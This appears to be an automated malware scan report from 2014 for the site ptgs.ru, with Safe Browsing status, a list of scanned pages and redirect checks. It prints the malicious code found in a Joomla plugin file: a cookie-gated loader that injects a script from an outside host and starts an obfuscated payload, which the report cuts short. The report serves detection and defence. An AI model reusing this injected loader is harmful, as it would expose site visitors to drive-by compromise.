Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ptgs.ru
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ptgs.ru/ | 200 OK Content-Length: 21406 Content-Type: text/html | clean |
http://ptgs.ru/mambots/content/plugin_jw_allvideos/gz_eolas_fix.js | 200 OK Content-Length: 1611 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function writethis(what) {
document.write(what); }function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000)); if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<scr'+'ipt src="http://ratingsite.org/ratingsite.php"></scr'+'ipt>');} var I=false || !!document.documentMode;if(I||F||window.opera){$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$. ...[514 bytes skipped]...
Antivirus reports:
http://ptgs.ru/index.html | HTTP/1.1 200 OK Connection: close Date: Tue, 17 Jun 2014 21:48:10 GMT Accept-Ranges: bytes Server: DataPalm/3.5 Content-Length: 176 Content-Type: text/html | clean |
http://ptgs.ru/index.php | 200 OK Content-Length: 21406 Content-Type: text/html | clean |
http://ptgs.ru/en_index.html | 200 OK Content-Length: 9521 Content-Type: text/html | clean |
http://ptgs.ru/en_about.html | 200 OK Content-Length: 6330 Content-Type: text/html | clean |
http://ptgs.ru/en_proiz.html | 200 OK Content-Length: 7541 Content-Type: text/html | clean |
http://ptgs.ru/en_press.html | 200 OK Content-Length: 6195 Content-Type: text/html | clean |
http://ptgs.ru/en_contacts.html | 200 OK Content-Length: 6071 Content-Type: text/html | clean |
http://ptgs.ru/test404page.js | 404 Not Found Content-Length: 351 Content-Type: text/html | clean |
http://ptgs.ru/en_press_news.html | 200 OK Content-Length: 6178 Content-Type: text/html | clean |
http://ptgs.ru/en_press_otziv.html | 200 OK Content-Length: 8728 Content-Type: text/html | clean |
http://ptgs.ru/en_press_photo.html | 200 OK Content-Length: 7509 Content-Type: text/html | clean |
http://ptgs.ru/en_press_video.html | 200 OK Content-Length: 6192 Content-Type: text/html | clean |
http://ptgs.ru/photo_gorno.html | 200 OK Content-Length: 12904 Content-Type: text/html | clean |
http://ptgs.ru/about.html | 200 OK Content-Length: 9264 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ptgs.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Tue, 17 Jun 2014 21:48:02 GMT
Pragma: no-cache
Server: DataPalm/3.5
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 17 Jun 2014 21:48:19 GMT
Set-Cookie: 28ff5740c59d3f8b46d4156388d432f0=-; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: ptgs.ru
Referer: http://www.google.com/search?q=ptgs.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.